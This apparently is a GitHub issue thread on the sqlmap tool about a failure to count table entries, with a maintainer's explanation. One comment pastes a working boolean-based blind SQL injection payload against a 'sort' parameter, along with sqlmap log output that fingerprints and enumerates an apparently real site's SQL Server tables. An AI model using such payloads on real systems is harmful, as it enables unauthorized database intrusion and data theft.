-
-
Notifications
You must be signed in to change notification settings - Fork 5.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
unable to retrieve the number of entries for table #502
Comments
I would say that you don't have enough permissions on that table. Could you please send a console output of same run together with a switch |
Hi, offcourse. Microsoft OLE DB Provider for SQL Server Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) Investiční plány města rok 2013 (.xls 18kB) |
|
how if the error is like this: does it because i use tamper? i used space2morehash.py anyway |
@alfianwi97 that is a generic error message when MySQL fails to retrieve the data (e.g. because of errors in SQL or similar). It could be caused by tamper script or generally because of non-existence of SQL injection in the first place |
any advice with this pls?
Place: GET
Parameter: sort
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
Payload: cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(SELECT (CASE WHEN (9414=9414) THEN CHAR(40)+CHAR(115)+CHAR(101)+CHAR(108)+CHAR(101)+CHAR(99)+CHAR(116)+CHAR(32)+CHAR(99)+CHAR(111)+CHAR(110)+CHAR(118)+CHAR(101)+CHAR(114)+CHAR(116)+CHAR(40)+CHAR(105)+CHAR(110)+CHAR(116)+CHAR(44)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(53)+CHAR(50)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(54)+CHAR(55)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(49)+CHAR(55)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(56)+CHAR(49)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(49)+CHAR(54)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(48)+CHAR(49)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(55)+CHAR(48)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(50)+CHAR(48)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(57)+CHAR(57)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(53)+CHAR(55)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(48)+CHAR(57)+CHAR(41)+CHAR(41)+CHAR(32)+CHAR(70)+CHAR(82)+CHAR(79)+CHAR(77)+CHAR(32)+CHAR(115)+CHAR(121)+CHAR(115)+CHAR(99)+CHAR(111)+CHAR(108)+CHAR(117)+CHAR(109)+CHAR(110)+CHAR(115)+CHAR(41) ELSE 9414*(SELECT 9414 FROM master..sysdatabases) END))&vyhledat=vyhledat
[22:23:09] [INFO] testing Microsoft SQL Server
[22:23:09] [INFO] confirming Microsoft SQL Server
[22:23:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:23:10] [INFO] fetching columns for table 'sysoperators' in database 'msdb'
[22:23:10] [INFO] the SQL query used returns 20 entries
[22:23:10] [INFO] starting 4 threads
[22:23:10] [INFO] resumed: category_id
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: email_address
[22:23:10] [INFO] resumed: nvarchar
[22:23:10] [INFO] resumed: enabled
[22:23:10] [INFO] resumed: tinyint
[22:23:10] [INFO] resumed: id
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: last_email_date
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: last_email_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: last_netsend_date
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: last_pager_date
[22:23:10] [INFO] resumed: last_netsend_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: netsend_address
[22:23:10] [INFO] resumed: pager_address
[22:23:10] [INFO] resumed: nvarchar
[22:23:10] [INFO] resumed: nvarchar
[22:23:10] [INFO] resumed: name
[22:23:10] [INFO] resumed: nvarchar
[22:23:10] [INFO] resumed: saturday_pager_start_time
[22:23:10] [INFO] resumed: saturday_pager_end_time
[22:23:10] [INFO] resumed: pager_days
[22:23:10] [INFO] resumed: tinyint
[22:23:10] [INFO] resumed: sunday_pager_end_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: last_pager_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: weekday_pager_end_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: sunday_pager_start_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] resumed: weekday_pager_start_time
[22:23:10] [INFO] resumed: int
[22:23:10] [INFO] fetching entries for table 'sysoperators' in database 'msdb'
[22:23:10] [INFO] resumed:
[22:23:10] [INFO] fetching number of entries for table 'sysoperators' in database 'msdb'
[22:23:10] [INFO] retrieved:
[22:23:10] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[22:23:10] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:23:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:23:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[22:23:12] [WARNING] unable to retrieve the number of entries for table 'sysoperators' in database 'msdb'
[22:23:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
The text was updated successfully, but these errors were encountered: